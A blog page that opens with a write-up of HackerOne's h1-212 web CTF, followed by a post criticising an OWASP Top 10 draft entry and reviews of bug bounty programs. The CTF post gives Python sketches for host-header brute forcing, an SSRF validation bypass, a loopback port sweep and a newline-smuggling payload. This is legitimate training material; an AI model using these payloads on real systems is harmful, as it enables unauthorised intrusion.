Wednesday 22 November 2017

h1-212 CTF Writeup


This is a writeup of h1-212, a web-based CTF by HackerOne. You can find the results and other writeups online. The last CTF I completed was for NULLCON way back in 2011, so I’m a tad rusty and this shouldn’t be taken as a how-to. Think of it more as a post-mortem. In order to make the solutions look a bit less like magic, I’ve intentionally included everything I attempted and the underlying thought process, regardless of whether it actually worked. This has predictably resulted in the post being horribly long, so you might want to grab a cup of tea before you begin.

To start, let’s take a look at the CTF introduction:
An engineer launched a new server for a new admin panel. He is completely confident that the server can’t be hacked. He added a tripwire that notifies him when the flag file is read. He also noticed that the default Apache page is still there, but according to him that’s intentional and doesn’t hurt anyone. Your goal? Read the flag!

As expected, the only visible thing on the server was a taunting default Apache page, which didn’t even have any notable HTTP headers. It’s a familiar and uninspiring sight for bug bounty hunters; it’s often impossible to know whether pages like this hide anything interesting.

Finding an entry point

Faced with a dull and surely well-tested piece of attack surface, I decided to hunt for some more interesting content. I launched a series of bruteforce attacks using Burp Intruder and the RAFT wordlists to enumerate supported file extensions, directories, HTML and PHP files. These found absolutely nothing.

While failing to find web content I also launched a full TCP portscan which revealed that SSH was accessible and had password-based authentication enabled, meaning that either I was expected to bruteforce the password, or the challenge creator simply hadn’t bothered to lock the server down. I correctly guessed that it was the latter and moved on.

By this point it was becoming apparent that bruteforcing was on everyone’s mind and the server started to buckle, causing some seriously extravagant response times. 20,000 requests later the file/folder bruteforce attempts had still found nothing, which only left one plausible explanation: the actual admin panel must be located on a non-default virtual host, meaning it would stay hidden until I supplied the correct Host header. The CTF introduction mentioned the target company’s domain, but simply supplying that as the Host header didn’t work, so the virtual host had to be a subdomain. I didn’t have a subdomain wordlist handy, so I lazily re-used the RAFT directory one:
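The attack itself is trivial to script; here’s a rough Python sketch of the idea. The IP, base domain, and wordlist filename below are placeholders, not the real CTF values.

```python
# Sketch of the virtual-host brute force. TARGET_IP and BASE_DOMAIN are
# placeholders - the real CTF values are omitted here.
import http.client

TARGET_IP = "203.0.113.10"
BASE_DOMAIN = "example.com"

def parse_wordlist(lines):
    """Strip whitespace and drop blanks/comments from a RAFT-style wordlist."""
    words = []
    for line in lines:
        word = line.strip()
        if word and not word.startswith("#"):
            words.append(word)
    return words

def probe_vhost(subdomain):
    """Request / with a candidate Host header; return (status, body length)."""
    conn = http.client.HTTPConnection(TARGET_IP, 80, timeout=10)
    try:
        conn.request("GET", "/", headers={"Host": f"{subdomain}.{BASE_DOMAIN}"})
        resp = conn.getresponse()
        return resp.status, len(resp.read())
    finally:
        conn.close()

# Usage (requires network access to the target):
#   for word in parse_wordlist(open("raft-small-directories.txt")):
#       status, size = probe_vhost(word)
#       ...flag any response that differs from the default Apache page
```

Any hit is identified by its response length differing from the default Apache page, the same signal Burp Intruder surfaces in its results table.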

This worked perfectly, discovering the admin panel’s virtual host:

Seeking valid input

The response contained the header ‘Set-Cookie: admin=no’ which is a transparent invitation to send ‘Cookie: admin=yes’. Attempting this resulted in a completely unexpected ‘Method not allowed’ response:

Fortunately, FuzzDB has a wordlist containing every conceivable HTTP method, so I was able to once again brute-force my way towards the flag:

Here we can see that the POST method generates a slightly different response from the others. At this point I got a bit confused and mistakenly decided this must be a server-level error caused by sending a POST request with no body. I tried to resolve this by specifying the Content-Length header without success, then wasted an extremely long five minutes staring at the screen trying to decide what insane custom HTTP header Jobert had thought up.

I then poked the server a bit and made a crucial observation: changing the value of the ‘admin’ cookie resulted in the 406 Not Acceptable response code disappearing:

Cookie: admin=yes
Content-Type: application/x-www-form-urlencoded
Content-Length: 9


HTTP/1.1 406 Not Acceptable
Date: Tue, 14 Nov 2017 21:17:20 GMT
Server: Apache/2.4.18 (Ubuntu)

Cookie: admin=blah
Content-Type: application/x-www-form-urlencoded
Content-Length: 9


HTTP/1.1 200 OK
Date: Tue, 14 Nov 2017 21:17:45 GMT
Server: Apache/2.4.18 (Ubuntu)

This behaviour indicated that the 406 status code was being generated by custom PHP code rather than Apache itself, and suggested that the application simply didn’t like the Content-Type of my request. Sure enough, changing it to application/json worked:

Cookie: admin=yes
Content-Type: application/json
Content-Length: 9


HTTP/1.1 418 I'm a teapot
Server: Apache/2.4.18 (Ubuntu)
Content-Length: 37
Connection: close
Content-Type: application/json


From here, a series of seriously helpful (and sadly realistic) error messages guided me onward:

Response: {"error":{"domain":"incorrect value, .com domain expected"}}

Response:  {"error":{"domain":"incorrect value, sub domain should contain 212"}}

Finally, I had a valid input:

Response:  {"next":"\/read.php?id=1"}

Fetching /read.php?id=1 made the application send an HTTP request to the specified domain, and display the response base64-encoded.

Exploring capabilities

To fingerprint the client, I needed to make it issue a request to a server I could observe. This was problematic, as none of my callback domains ended in ‘.com’. Mercifully, it turned out that the application doesn’t validate the domain correctly, so you can fulfil the ‘.com domain’ requirement using the path:
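In other words, the validator appears to check only for a ‘212’ subdomain and a ‘.com’ suffix without actually parsing the URL, so a payload along these lines (with a hypothetical callback host) satisfies both checks:

```python
def make_payload(callback_host):
    """Satisfy the '.com' check via the path while pointing at our server.

    The validator appears to only require that the subdomain contains
    '212' and the value ends in '.com', so a fake path component is
    enough. callback_host is a hypothetical placeholder.
    """
    return {"domain": f"sub212.{callback_host}/x.com"}
```

For example, `make_payload("collab.example.net")` yields a domain value that passes validation while the request actually lands on the attacker-controlled host.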


This resulted in a surprisingly simple request hitting the collaborator:

GET / HTTP/1.0

The non-standard use of HTTP/1.0 with a Host header, combined with the absence of standard HTTP headers like ‘Connection’, implied that this request was being issued by custom code rather than a full-featured HTTP client like curl. This suggested that certain SSRF techniques, like abusing redirects, probably wouldn’t work. During this process I also noticed that the HTTP request wasn’t sent until I hit the read.php page, which seemed slightly strange but not particularly useful. This detail turned out to be extremely important later on.

At this point, although I’d found a serious vulnerability I still had no idea where the flag was.

One possibility was that the flag was hidden on the filesystem, and I was expected to find a way to use the SSRF to access local files via the file:/// protocol or perhaps a pseudo-protocol like php://filter. I was able to rule this out by confirming that even the http protocol didn’t work.

Another possibility was that the flag was embedded in the admin panel and only accessible via the loopback interface. I found I could route requests to loopback using a domain that resolved to 127.0.0.1, but this request would be sent with that domain as the Host header, meaning that it hit the default virtual host with its beloved default Apache page, rather than the administration panel. I initially attempted to bypass this using an @-based URL, but the client didn’t support @.

Then I decided that as the HTTP client was so basic, it might be vulnerable to request header injection, letting me inject an extra Host header of my choosing. Unfortunately this attack failed too; the application simply failed to return a response when I submitted a new line. When I attempted this attack, I noticed that the corresponding ID number on /read.php incremented by two rather than one. This was actually another clue to a critical implementation detail, but at the time I assumed that someone had simply caught up with me in the CTF and disregarded it.

I decided to launch a fresh bruteforce attack, this time on the admin panel, and manually tackled the ‘id’ parameter while that ran. I found that although the input was strictly validated, supplying a high id resulted in a puzzling error: {"error":{"row":"incorrect row"}}

Once again, I disregarded this crucial clue to how the domain-fetch was being implemented, and continued my hunt.

I then checked back on my bruteforce, which had discovered /reset.php, a page that took no arguments and reset the read.php ID counter. Although this page was pretty much useless, its existence implied that the ID might be expected to reach very high numbers - something that would only happen if the SSRF was used in a bruteforce attack.

The obvious target for a bruteforce was localhost; there might be something exploitable bound to loopback, like a convenient Redis database. Using Intruder with a list of the 5,000 most popular TCP ports borrowed from nmap, I made a discovery on port 1337:


<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/1.10.3 (Ubuntu)</center>
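For reference, the sweep payloads can be generated along these lines. I’ve assumed a wildcard DNS name that resolves everything to 127.0.0.1 (localtest.me is one such service), which may differ from the routing trick actually used:

```python
# Sketch of the loopback port sweep. LOOPBACK_HOST is an assumption:
# any wildcard DNS name that resolves to 127.0.0.1 (e.g. localtest.me).
LOOPBACK_HOST = "localtest.me"

NMAP_TOP_PORTS = [80, 443, 22, 1337, 6379, 8080]  # illustrative subset

def port_payload(port):
    """Build a domain value that routes the SSRF to 127.0.0.1:<port>
    while still passing the '212' and '.com' checks via the path."""
    return f"sub212.{LOOPBACK_HOST}:{port}/x.com"

# Submitted in a loop via the JSON POST endpoint, any port returning a
# body - like 1337's nginx 404 - stands out from connection failures.
```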

A false solution

Figuring the flag was probably in the web root, I changed the payload to target it directly and received the message “Hmm, where would it be?”

Feeling quite accomplished at getting this far while everyone else was stuck near the start, I made the tactical error of prematurely reporting my progress to Jobert. He quickly grew suspicious of how fast I’d got there, and asked to see the payload I was using:

It turned out that using a ? to hit the root directory and avoid the 404 message was an unintentional bypass and the character was promptly blacklisted, leaving me stuck once again on the 404 page.


I initially tried to work around this by abusing PHP’s path handling and accessing /index.php/, but the server wasn’t running PHP. I then started to explore why the ID number incremented by two whenever the payload contained \n, and realised that the domains must be inserted into newline-delimited storage. This explained the ‘incorrect row’ error message from earlier. After that, grabbing the flag was simple:
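For anyone curious, the idea can be sketched as follows; the names and exact payload format are illustrative rather than the literal solution:

```python
def inject_rows(loopback_target, decoy="sub212.example.com"):
    """Smuggle a raw loopback target into its own storage row.

    Because the application stores submitted domains in newline-delimited
    storage, a value containing \n creates two rows, and the second row -
    the raw loopback target - never went through domain validation.
    Values here are illustrative.
    """
    return {"domain": f"{decoy}\n{loopback_target}"}

def injected_row_id(decoy_id):
    """Each newline adds an extra row, so the smuggled target sits one
    row after the decoy."""
    return decoy_id + 1

# e.g. submit inject_rows("localhost:1337"), note the id assigned to the
# decoy row, then fetch /read.php?id=injected_row_id(that_id) and
# base64-decode the result.
```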



In total this challenge took me two and a half hours to complete, and in spite of my many mistakes I was still the first person to crack it. Taking part was a great experience, thanks to both the quality of the challenges and the atmosphere and banter supplied in ample quantity by other participants. Thanks to everyone involved!

Monday 24 April 2017

Abusing OWASP with 'Insufficient Attack Protection'

I have no love for drama, but over the last couple of years I’ve witnessed some shameless abuse of OWASP by commercial interests, and I feel it's important to call this out.

The latest draft of the OWASP Top 10 ‘Most Critical Web Application Security Risks’ added a new entry at A7, titled ‘Insufficient Attack Protection’. It claims that failing to detect and respond to attacks is a critical risk.

This is a surprising and distinctly out of place addition to the top 10; every other entry is a serious vulnerability that poses a notable risk by itself, whereas failure to detect attacks is only hazardous when combined with a real vulnerability.

Furthermore, addressing any other entry in the top 10 provides a clear net positive to a webapp’s security posture, whereas complying with A7 can easily cause net harm. Complying with A7 makes it extremely awkward to run an accessible bug bounty program, since it will hinder researchers trying to help you out. It also increases your attack surface (much like antivirus software) and introduces the risk of denial-of-service attacks via spoofed attacks from other users.

I’m not the only one in the community who thinks Insufficient Attack Protection has no place in the top 10 - a poll by @thornmaker found 80% of 110 respondents thought it should be removed.

At this point, you might be wondering where A7 came from. According to a contributor, it was "suggested by Contrast Security and *only* by Contrast Security".

I wonder why Contrast Security made this suggestion? Well, we can find a clue on their website - they’ve already started using A7 to flog ‘Contrast Protect’, their shiny attack protection solution:
A7: Insufficient Attack Protection. This new requirement means that applications need to detect, prevent, and respond to both manual and automated attacks. […] Contrast Protect effectively blocks attacks by injecting the protection directly into the application where it can take advantage of the full application context.

Still, perhaps I shouldn’t rush to assume Contrast Security is acting in bad faith and abusing the OWASP brand name to sell a product. It’s not like they’ve done anything like this before is it?

In 2015 Contrast/Aspect released a tool to evaluate vulnerability scanners dubbed “OWASP Benchmark”. This is much lower profile than the OWASP Top 10, but I work for a web scanner vendor myself so it caught my attention. Just like the new OWASP Top 10, there was something a bit odd about it - it ranked Contrast’s scanner vastly higher than all the competition, something they made sure to point out in marketing materials.

Here’s what Simon Bennetts, the OWASP project leader for ZAP, had to say:
Here we have a company that leads an OWASP project that just happens to show that their offering in this area appears to be _significantly_ better than any of the competition. Their recent press release stresses that its an OWASP project, make the most of the fact that the US DHS helped fund it but make no mention of their role in developing it.

Simon's post caused extensive discussion on the OWASP leaders mailing list, eventually leading to Jim Manico (an OWASP board member at the time) calling for the project to be demoted to 'incubator' status to reflect its immaturity. The project is still in incubator status today. This hasn’t stopped Gartner from using it to compare scanning vendors, so I guess Contrast still got their money’s worth.

All in all I think it’s pretty clear why Insufficient Attack Protection has suddenly appeared. Perhaps the OWASP Top 10 should be demoted to incubator status too :-)

- albinowax

Thursday 11 August 2016

Reviewing bug bounties - a hacker's perspective

A prospective bug bounty hunter today has very little information on which to base his or her decision about which programs to participate in. There's a dramatic horror story every few months and that's about it. This is unfortunate because bounty hunting is founded on mutual trust; nobody wants to spend hours auditing a target only to find out that the client is disrespectful, incompetent, or likes to avoid paying out. I thought it might be helpful to write up reviews of the different bounty programs and platforms that I've dealt with.

You might be wondering exactly how much bug bounty hunting I've done in order to feel qualified to write this, particularly as I only bother writing up bounties if I consider them highly notable. I've been doing this in my spare time for roughly five years - my first bounty from Google was back in 2011, and I reported enough issues to star in their 0x0A list when it was first created in 2012. Over the years I've also reported a bunch of issues to Mozilla, a few of which are public (side note: the publicly disclosed SQLi is hilarious). Other activity is visible on HackerOne, Cobalt, Bugcrowd, and in a few blog posts. I've received maybe 50 separate bounties in total, which I view as a decent sample.

I’ll try to provide the evidence and reasoning behind my conclusions, particularly when I had a poor experience with a program. Because trust is critical to the bounty process, if my first experience with a bounty program was bad I would never use it again. So, if I give somewhere a bad review it’s always possible I was just unlucky. If you strongly agree or disagree with any of these reviews, do drop a comment or write up your own experience.

To keep things competitive, I’ve sorted the reviews by how good the overall experience is. Scroll down for the dirt.

Program Reviews


Google

Google is consistently a pleasure to work with. They have a highly skilled, responsive and respectful security team, and offer healthy payouts. They also offer to double bounties if you donate them to charity, which is pretty cool. They sometimes send shiny gifts to their top researchers, and there's the awesome party in Vegas... The only ‘downside’ is that these days, actually finding a decent vulnerability in one of their core products can be tricky relative to other targets.

We do have a disagreement about who bears responsibility for preventing CSV Injection attacks but they're going to change their minds soon so that's ok ;)
Uber (hackerone)
Uber is my current focus for bounty hunting because their scope is huge, they pay exceptionally well, and they don’t try to wriggle out of paying rewards. My last three bounties from Uber were $3,000, $7,500 and $5,000, for reflected and stored XSS. As their bounty program is much younger than Google’s, it takes significantly less effort to find decent vulnerabilities in their websites.

Uber’s commitment to putting everything in scope is exceptional - Uber and Bugcrowd both use the same third party to host their documentation, and while Bugcrowd declared their documentation out of scope, Uber worked with the third party to keep theirs in scope. The somewhat amusing result is that if it wasn’t for Uber’s bug bounty program, it would be trivial to get administrative access to the shared documentation platform.

That said, I’ve found their triage team a little frustrating at times. For example, I provided a detailed writeup clearly explaining how to replicate some reflected XSS, and they responded by asking me to submit a video. I get the impression that they sometimes skim-read reports and miss critical details such as “It's designed to work in Internet Explorer 11”.


Mozilla

Mozilla is interesting in that you often get to interact directly with the developers responsible for fixing your vulnerabilities, via Bugzilla. This can be a blessing and a curse - it’s important to remember you can always summon the security team to mediate. I did have one bad experience with them early on - I reported a stored XSS bug where I couldn’t provide a PoC due to a length limitation, and the developer fixed it within a few hours then argued it wasn’t a security issue. However, other times I’ve been paid $3k for vulnerabilities I thought were pretty lame - they certainly aren’t stingy with payouts.

Mozilla are another example of where diligent bounty scoping improves the security of the entire web ecosystem. While many bounty programs refuse to pay up for exploits in third party code, Mozilla happily pay for any exploits in the Django framework that you can replicate on their sites, and everyone using Django is undoubtedly more secure as a result.

Another benefit of Mozilla is that if you request it, they’re happy to publicly disclose most bugs after they’ve been fixed. I view this as significantly better than being placed in a generic hall of fame, particularly if you’re early in your career - potential employers can see the technical details of your bugs. Overall I enjoy working with Mozilla even if the process isn’t always as slick as Google.


Shortly after their program opened, I reported CSRF via form-action-hijacking to them and got $1,000 on one of their highly 1337 debit cards for my troubles. It took quite a few emails before their security team fully understood the vulnerability, but they were cordial the whole time and the vulnerability is pretty esoteric so that’s understandable.


Piwik

As you might expect from a free open source project, the bounties aren’t massive - I got $242 for unauthenticated stored XSS - but they’re friendly and highly responsive. The main thing to beware of is that although they’ll give public credit, they prefer that critical vulnerability details aren’t disclosed even after patches have been released, to mitigate poor patch uptake.

I don't think this is a great policy, but it helps to understand the context behind it. Piwik is the only program where I’ve personally seen clear evidence of black-market interest in high-quality exploits. I think this is because it’s deployable and widely used - you could probably get a foothold in all sorts of organisations with an exploit for it.

CodePen (bugcrowd)

Codepen are the coolest program I’ve dealt with that doesn’t pay cash bounties. I got remote code execution on their site a few times, had a nice chat with them and they graciously agreed to let me disclose the full details at BlackHat USA last year.


Prezi

I reported stored XSS to them on April 20th; they replied within 2 days but didn’t actually confirm it until June 6th, which is pretty slow. The reward was $500 and I have yet to be paid, but I have confidence it’ll arrive one of these months.

The most notable thing about Prezi’s program is that they go to extraordinary lengths to prove that they aren’t cheating people by fraudulently marking issues as duplicates, using secret gists on GitHub. It’s cool that they make this effort, but I think it’s unnecessary really; if you view a company as dishonest you should stay well clear of their bounty program. There are plenty of other ways they can screw you over if they want to.

AwardWallet, Zendesk, Informatica, WP-API, Fastmail, and unnamed others

I’ve reported issues to them without anything of note happening, other than Zendesk claiming the dubious achievement of awarding me the lowest non-zero bounty I've ever received for XSS - $50, with which I could just about buy lunch out after tax.

Cloudflare (hackerone)

Their program appears to be under-resourced. I reported an XSS to them on April 16th; they took over two weeks to first respond to it, and have still yet to fix it. This is sadly a frequent occurrence with programs that don’t pay cash bounties. Even if you’re bounty hunting for recognition rather than income, I’d recommend focusing on programs that pay a token cash bounty, because at least you can be reasonably sure they take it seriously.

(bugcrowd)

I reported a fairly serious vulnerability to these guys and they fixed the issue and changed the status to resolved without saying a word. While I admire their efficiency, I've had better interactions with vending machines.


Ebay

I reported a serious CSRF issue to Ebay several years ago and despite numerous emails back and forth, they failed to understand it. As far as I know the issue remains unpatched to this day.

Dropbox (hackerone)

Dropbox state that they pay $5000 for XSS, so when I reported a vulnerability that could be used to gain read/write access to users’ Dropbox folders given a small amount of user interaction, I was a bit puzzled to get $0. The exploit is a bit unusual, so instead of trusting my reasoning you might want to take a look at the report and come to your own conclusion. I’m not surprised that they protested when I requested public disclosure of the issue. On the bright side, I found the vulnerability by accident, so I only wasted about half an hour on them.

Western Union (bugcrowd)

Western Union appears to be a glaring exception to the concept that companies that pay cash bounties take their programs seriously.

I reported two vulnerabilities to them. Both were (in my professional opinion) fairly serious, and distinctly obvious. The first was marked as a duplicate of an issue reported over a year prior. Failing to patch an obvious vulnerability for over a year shows disrespect towards the numerous researchers who inevitably waste their time reporting it. The second received a $100 reward. When a company claims they pay $100-$5000 per vulnerability, I find it somewhat surprising to receive $100 for a bug that could probably be used to steal money.

Zomato (hackerone)
Zomato have provided my worst bounty experience so far. I generally have low expectations for commercial companies that don't pay cash bounties, but I was still surprised when they refused to reply to my issue, even after I used HackerOne's apparently ineffective 'request mediation' feature.

After 90 days I decided to publicly disclose the issue, only to discover they had silently patched it. I'm still waiting for them to reply to my submission, or mark it as resolved. Here's the entire thrilling report:

I wrote up the associated research in a separate post.

Platform Reviews

HackerOne platform

Of all the bug bounty platforms, HackerOne comes across as the best developed from a hacker’s perspective. I particularly appreciate the heavily integrated support for full disclosure and overall transparency. You can easily identify the payout range of many programs using publicly disclosed vulnerabilities, and spare yourself unpleasant surprises. The reputation/signal system also makes it stand out. Yet another cool HackerOne feature I'd like to see in other platforms: if the hacker requests it, vulnerabilities are automatically disclosed after a fixed length of time, without the company having to manually approve it.

One problem I've encountered on HackerOne is vendors not noticing reports. I had to use a personal contact to get WP-API to respond to a serious access control bypass, and an issue I reported to BitHunt 6 months ago still hasn't been replied to. I invoked HackerOne's 'request mediation' function on BitHunt and they failed to respond too. Inactive companies should really be clearly marked as such to prevent researchers wasting their time.

I’ve found that companies offering larger bounties are less likely to have this issue - sizeable rewards are a good indicator that the company is actually committed to its bounty program.

Cobalt platform

Cobalt (formerly crowdcurity) has a whole bunch of bitcoin related websites which are really fun to hack, although the bounties aren’t the biggest. Regardless of the bounty size, I like the warm fuzzy feeling of knowing I could have stolen a huge number of bitcoins if I felt like it. Unfortunately I can’t name the specific sites, but will be disclosing technical details of many of these vulnerabilities in my "Exploiting CORS Misconfigurations for Bitcoins and Bounties" presentation at OWASP AppSecUSA.

Cobalt's platform isn't dripping with as many features as HackerOne's but it does the job. It also lets hackers score bug bounty programs and provide feedback, which is frankly awesome - reputation shouldn't just apply to hackers. I don't know if this is directly related, but on the whole I've had good experiences with programs on Cobalt, and definitely recommend giving them a shout. The main thing to beware of is that payouts can take a while - someone found a race condition in the bitcoin withdrawal function and I think they're all manually reviewed now.

Bugcrowd platform
After a few poor experiences in a row with programs on Bugcrowd I mostly avoid them, and therefore don't have much to say. I think they've been around the longest, and they don't deliver payments in bitcoin (subjecting all non-US users to PayPal’s awful exchange rates), but they evidently put effort into engaging with the community by presenting at conferences and releasing tools.

I’m sure there are good programs on there but I'll leave hunting them down to someone else.

About Payouts

Posts on bug bounties are frequently visited by commenters suggesting that the bug hunter could have got more cash by selling the vulnerability on ‘the black market’. My last payout was $5000 from Uber for an issue that took me six hours to find and write up. Do I feel shortchanged? No, and I wouldn’t have felt shortchanged with $500 either. I’m always happy to receive a large payout but I don’t feel entitled to it unless there’s a clear precedent. Could I have used that vulnerability to hijack a bunch of Uber developer accounts and cause well over $30k of carnage? Probably, but why would I want to do that? I honestly hope I won’t feel compelled to revisit this topic later. We’ll see.

That was it?

If you believe what some people write, you might conclude that every bug bounty program is out to exploit testers, wriggle out of paying rewards, pretend issues are duplicates, and generally act in bad faith. As you've hopefully gathered by reading this far, this does not reflect my own experience at all, and it would be a shame if this misconception put anyone off bounty hunting. The primary causes of drama seem to be broken expectations about payout size and program scope. Companies can mitigate these by writing clearly defined bounty briefings and encouraging publicly disclosed reports. Hackers can mitigate these by reading the briefs, using available information like publicly disclosed reports to set their expectations, and providing feedback on both good and bad experiences.

Hope that's helpful! Feel free to drop your own reviews in the comments or on your own site.